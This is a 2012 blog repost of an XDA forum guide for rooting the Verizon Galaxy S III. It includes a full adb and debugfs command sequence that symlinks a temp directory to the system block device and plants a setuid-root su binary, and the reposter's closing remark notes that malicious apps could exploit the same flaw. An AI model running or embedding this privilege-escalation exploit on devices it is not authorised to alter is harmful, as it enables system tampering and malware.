http://www.bot24.com/2012/08/debugfs-exploit-for-number-of-android.html

debugfs exploit for a number of Android devices

 8/15/2012 09:16:00 AM

I haven't seen a reference to this in the archives, so for the sake of
completeness here it is:

 [ROOT][HOWTO] WIP: Root the Verizon GSIII without flashing a ROM

UPDATE: I created a tool based on this method. Head over 

to the new thread.

---

WARNING: This is WIP for now. Don't run it if you aren't comfortable with the possibility of having 

something go wrong and having to re-Odin back to stock or worse. I was already rooted and had 

Busybox installed, so even though I temp-unrooted first, I don't know for certain if this will work 

on a stock device. If anyone wants to flash back to pure stock and give it a shot, I'd appreciate 

it. If it works, I'll try and make it easier to use.

NOTE: This may give you the custom unlock screen! I'm not 100% certain it was this root 

method that did it, though, as I had installed BusyBox and frozen several system apps with 

TiBu before my most recent reboot. I need someone willing to test.  I don't 

have time tobackup, flash to stock, and retry at the moment.

Background: Since some people seem to have mysterious issues after flashing the root66 image, I've been looking at existing ICS root methods which don't require flashing ROMs to see if any work on the GSIII. I think I've found one.

This is an adaptation of miloj's root method for the Asus TF300T. All credit goes to him and anyone else he mentioned in his post.

Instructions:

Install the USB drivers if you don't have them already: Verizon_Wireless_I535_GSIII_Samsung_USB_Driver_v1_ 4_6_0.exe
Download the attached binary package and extract them somewhere
Set up adb and make sure you can see your phone
Run the following commands in a shell. Red is a prompt you will see on the screen, black is something you type, blue is a comment.



Code:
adb push debugfs /data/local/
adb push su /data/local/
adb shell
$ cd /data/local/
$ mv tmp tmp.bak
$ ln -s /dev/block/mmcblk0p14 tmp
$ exit
adb reboot

... wait for phone to reboot ...

adb shell
$ cd /data/local
$ toolbox chmod 755 /data/local/debugfs
$ /data/local/debugfs -w /data/local/tmp
debugfs: cd xbin
debugfs: rm su
debugfs: write /data/local/su su
debugfs: set_inode_field su mode 0106755
debugfs: set_inode_field su uid 0
debugfs: set_inode_field su gid 0
debugfs: quit
$ rm /data/local/tmp
$ mv /data/local/tmp.bak /data/local/tmp
$ exit
adb reboot

... wait for phone to reboot ...

adb shell
$ /system/xbin/su
# id
You should see: id=0(root) gid=0(root) ....
# exit

$ rm /data/local/su
$ rm /data/local/debugfs
$ exit

This is using miloj's insecure su, so you should install the superuser app and immediately use its

binary update feature to install a proper binary. Otherwise, you're just asking to get malware.


ATTACHED FILES

debugfs_su.7z - [Click for QR Code] (654.0 KB, 124 views)

Source Link:
http://forum.xda-developers.com/showthread.php?t=1790104

Looks like on a number of devices you can symlink the block device
that gets mounted on /system to something like /data/local/tmp, and
then use debugfs to edit that file system.  This allows rooting by the
local user, but also all sorts of nastiness by malicious apps that
might bundle a copy of debugfs and then change arbitrary files in
/system, raise privileges, etc.